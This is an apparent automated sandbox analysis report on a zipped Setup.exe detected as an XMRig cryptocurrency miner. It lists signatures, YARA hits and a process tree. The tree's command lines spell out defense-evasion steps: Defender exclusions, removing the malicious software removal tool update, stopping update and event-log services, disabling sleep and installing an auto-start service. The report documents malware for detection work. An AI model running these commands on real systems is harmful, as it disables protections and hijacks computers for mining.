Windows Analysis Report
MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip

Overview

General Information

Sample name: MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip
Analysis ID: 1408951
MD5: 3384ccc27194a142f68c7ea1f157e2af
SHA1: 32644f4bf6678db76c9968fb048c8b3f78bb30ae
SHA256: b892d9e7e59c6e61d99f8aeb1521b57567b821e10036d825648aebb66e754763
Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 4508 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • svchost.exe (PID: 72 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Setup.exe (PID: 1036 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" MD5: DF65134B0B2B2CC03F07647794B274E5)
    • powershell.exe (PID: 1836 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Setup.exe (PID: 6476 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" MD5: DF65134B0B2B2CC03F07647794B274E5)
        • powershell.exe (PID: 6520 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6708 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 6796 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 6724 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6836 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6888 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6940 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6992 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7044 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7052 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7068 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7100 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dialer.exe (PID: 7144 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
          • winlogon.exe (PID: 584 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • lsass.exe (PID: 664 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 972 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • dwm.exe (PID: 380 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
        • sc.exe (PID: 4868 cmdline: C:\Windows\system32\sc.exe delete "SXJAJUSN" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 2652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 5388 cmdline: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1552 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1844 cmdline: C:\Windows\system32\sc.exe start "SXJAJUSN" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1728 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 3992 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 3964 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5152 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1448 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1444 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6296 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 6424 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • jnxsifnrdetl.exe (PID: 4248 cmdline: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe MD5: DF65134B0B2B2CC03F07647794B274E5)
    • powershell.exe (PID: 6536 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6560 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6756 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6528 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6852 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6880 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6936 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6952 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6980 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6948 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7004 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7028 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7112 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 728 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 460 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1068 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1076 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1136 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1204 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1260 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1452 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1528 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1676 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1756 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1780 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1800 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1808 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1964 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2004 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1300 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1368 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2112 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2168 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 2284 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
      • svchost.exe (PID: 2316 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2440 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2508 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2516 cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2632 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2640 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2680 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2688 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2700 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • OfficeClickToRun.exe (PID: 2764 cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service MD5: 75F42872C0302D36A1E3BB5C7928FC02)
      • svchost.exe (PID: 2892 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2944 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3416 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3672 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s NcdAutoSetup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • sihost.exe (PID: 3800 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3832 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3884 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 4068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 344 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2372 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 4144 cmdline: ctfmon.exe MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • dasHost.exe (PID: 4160 cmdline: dashost.exe {56d287c9-3fb8-41cd-a9e100d94de470c6} MD5: 2857A196985FC58A74C337B5E95B2174)
      • svchost.exe (PID: 4236 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 4292 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 4380 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • svchost.exe (PID: 4520 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • RuntimeBroker.exe (PID: 3372 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 5212 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 5620 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • dllhost.exe (PID: 6076 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • dialer.exe (PID: 7120 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 6444 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Source | Rule | Description | Author | Strings
00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37eb98:$a1: mining.set_target
  • 0x370e20:$a2: XMRIG_HOSTNAME
  • 0x373748:$a3: Usage: xmrig [OPTIONS]
  • 0x370df8:$a4: XMRIG_VERSION
Process Memory Space: dialer.exe PID: 6444 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Process Memory Space: dialer.exe PID: 6444 | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x13574:$a1: mining.set_target
  • 0xfd1d:$a2: XMRIG_HOSTNAME
  • 0x10a95:$a3: Usage: xmrig [OPTIONS]
  • 0xfcfe:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
81.2.dialer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
81.2.dialer.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION
81.2.dialer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
81.2.dialer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet
  • 0x3705f0:$s5: cryptonight
  • 0x370600:$s5: cryptonight
  • 0x370610:$s5: cryptonight
  • 0x370620:$s5: cryptonight
  • 0x370638:$s5: cryptonight
  • 0x370648:$s5: cryptonight
  • 0x370658:$s5: cryptonight
  • 0x370670:$s5: cryptonight
  • 0x370680:$s5: cryptonight
  • 0x370698:$s5: cryptonight
  • 0x3706b0:$s5: cryptonight
  • 0x3706c0:$s5: cryptonight
  • 0x3706d0:$s5: cryptonight
  • 0x3706e0:$s5: cryptonight
  • 0x3706f8:$s5: cryptonight
  • 0x370710:$s5: cryptonight
  • 0x370720:$s5: cryptonight
  • 0x370730:$s5: cryptonight

Change of critical system settings

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7044, ProcessName: powercfg.exe

System Summary

